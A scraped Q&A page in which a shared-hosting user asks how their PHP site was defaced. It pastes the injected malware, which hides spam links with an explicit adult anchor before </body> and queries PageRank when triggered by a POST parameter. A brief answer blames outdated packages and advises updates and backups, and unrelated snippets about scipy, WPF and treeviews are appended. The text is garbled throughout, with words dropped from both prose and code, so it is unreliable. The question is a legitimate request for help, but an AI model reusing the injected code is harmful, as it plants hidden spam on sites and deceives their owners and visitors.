php - my site got defaced. how to protect myself on shared hosting? -

-

i have godaddy shared hosting , site got defaced. @ fault? site created php possible person can in through vunerability on site , modify file? or through server side being godaddy wasnt secure enough?

this injected in file. do?

<?php //{{1311051f  global $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1;  $olderrxxx=error_reporting(0);  function outputxxx_callback($str) {   $links = '<span style="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="rb4d41ca36473534443c002805"><a href="http://www.wcvi.org/community_development/ecogardners/fresh/blow-jobs-teen/blow-jobs-teen.html">blow jobs teen</a><br></div></span>';   preg_match("|</body>|si",$str,$arr);   return str_replace($arr[0],$links.$arr[0],$str); }  function strtonum($str, $check, $magic) {    $int32unit = 4294967296;    $length = strlen($str);    ($i = 0; $i < $length; $i++) {        $check *= $magic;        if ($check >= $int32unit) {            $check = ($check - $int32unit * (int) ($check / $int32unit));            $check = ($check < -2147483648) ? ($check + $int32unit) : $check;        }        $check += ord($str{$i});    }    return $check; } function hashurl($string) {    $check1 = strtonum($string, 0x1505, 0x21);    $check2 = strtonum($string, 0, 0x1003f);     $check1 >>= 2;    $check1 = (($check1 >> 4) & 0x3ffffc0 ) | ($check1 & 0x3f);    $check1 = (($check1 >> 4) & 0x3ffc00 ) | ($check1 & 0x3ff);    $check1 = (($check1 >> 4) & 0x3c000 ) | ($check1 & 0x3fff);     $t1 = (((($check1 & 0x3c0) << 4) | ($check1 & 0x3c)) <<2 ) | ($check2 & 0xf0f );    $t2 = (((($check1 & 0xffffc000) << 4) | ($check1 & 0x3c00)) << 0xa) | ($check2 & 0xf0f0000 );     return ($t1 | $t2); }  function checkhash($hashnum) {    $checkbyte = 0;    $flag = 0;     $hashstr = sprintf('%u', $hashnum) ;    $length = strlen($hashstr);     ($i = $length-1; $i >= 0;  $i--) {        $re = $hashstr{$i};        if (1 === ($flag % 2)) {            $re += $re;            $re = (int)($re / 10) + ($re % 10);        }        $checkbyte += $re;        $flag ++;    }     $checkbyte %= 10;    if (0 !== $checkbyte) {        $checkbyte = 10 - $checkbyte;        if (1 === ($flag % 2) ) {            if (1 === ($checkbyte % 2)) {                $checkbyte += 9;            }            $checkbyte >>= 1;        }    }     return '7'.$checkbyte.$hashstr; }  function getpr($url) {    $ch = checkhash(hashurl($url));    $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=rank&q=info:$url";;    $data = file_get_contents($file);    $pos = strpos($data, "rank_");    if($pos === false){return -1;} else{        $pr=substr($data, $pos + 9);        $pr=trim($pr);        $pr=str_replace(" ",'',$pr);        return $pr;    } }  if(isset($_post['xxxprch'])) {     echo getpr($_post['xxxprch']);     exit(); } else   ob_start('outputxxx_callback');  error_reporting($olderrxxx); }  //}}75671d8f ?>

chances exploit package use on site (such phpbb, phpnuke, etc.) people crawl web looking vulnerable hosts , exploit ones can. code open-source , readily available there's not can protection other use latest version.

companies packetstormsecurity make easy "skript kiddies" find poc (proof of concept) script , take upon try on every site can. easy crafted google query find list of potential targets.

you may able through logs url resulted in exploit, best-case scenario stay up-to-date possible, , never rely on host make restore-able backups of site.


Comments

Post a Comment

Popular posts from this blog

python - Scipy curvefit RuntimeError:Optimal parameters not found: Number of calls to function has reached maxfev = 1000 -

-
Image
i want make logharitmic fit. keep getting runtime error: optimal parameters not found: number of calls function has reached maxfev = 1000 i use following script. can tell me go wrong? use spyder still beginner. import math import matplotlib mpl scipy.optimize import curve_fit import numpy np #data f1=[735.0,696.0,690.0,683.0,680.0,678.0,679.0,675.0,671.0,669.0,668.0,664.0,664.0] t1=[1,90000.0,178200.0,421200.0,505800.0,592200.0,768600.0,1036800.0,1371600.0,1630800.0,1715400.0,2345400.0,2409012.0] f1n=np.array(f1) t1n=np.array(t1) plt.plot(t1,f1,'ro',label="original data") # curvefit def func(t,a,b): return a+b*np.log(t) t=np.linspace(0,3600*24*28,13) popt, pcov = curve_fit(func, t, f1n, maxfev=1000) plt.plot(t, func(t, *popt), label="fitted curve") plt.legend(loc='upper left') plt.show() your original data t1 , f1 . therefore curve_fit should given t1 second argument, not t . popt, pcov = curve_fit(func,...
Read more

binding - How can you make the color of elements of a WPF DrawingImage dynamic? -

-
we have need make vector graphic images change color of elements within graphic @ runtime. seem setting colors based on either static or dynamic resource values wouldn't work. want have multiple versions of same graphic, each abilty set graphic elements (path, line, etc) different colors don't think dynamic resource approach work. leaves data binding seems right approach. update graphic use data binding expr instead of hard-coded brush color so: <drawingimage x:key="graphic1"> <drawingimage.drawing> <drawinggroup> <drawinggroup.children> <geometrydrawing geometry="f1 m 8.4073,23.9233l"> <geometrydrawing.pen> <pen linejoin="round" brush="{binding line1brush, mode=oneway}"/> </geometrydrawing.pen> </geometrydrawing> <geometrydrawing geometry="f1 m 3.6875,2.56251l"> <geometrydrawing....
Read more

c# - How to add a new treeview at the selected node? -

-
i have treeview 4 levels; parent, child, grandchild, great-grandchild. selectednode @ grandchild level. what i'm trying create new "treeview" @ grandchild - no, dont wnat create new node "selectednode" (grandchild). should somelike this: parent child grandchild (new treeview) parent grandchild great-grandchild child great-grandchild child grandchild grandchild it similar parent table mother , father went off , had new childern different spouse other spouse of there existing children. private sub populaterootlevel() ' query find first round of parent populatenodes(dt, jcatreeview.nodes) end sub private sub populatenodes(byval dt datatable, byval nodes treenodecollection) each dr datarow in dt.rows dim tn new treenode() tn.text = dr("title").tostring()...
Read more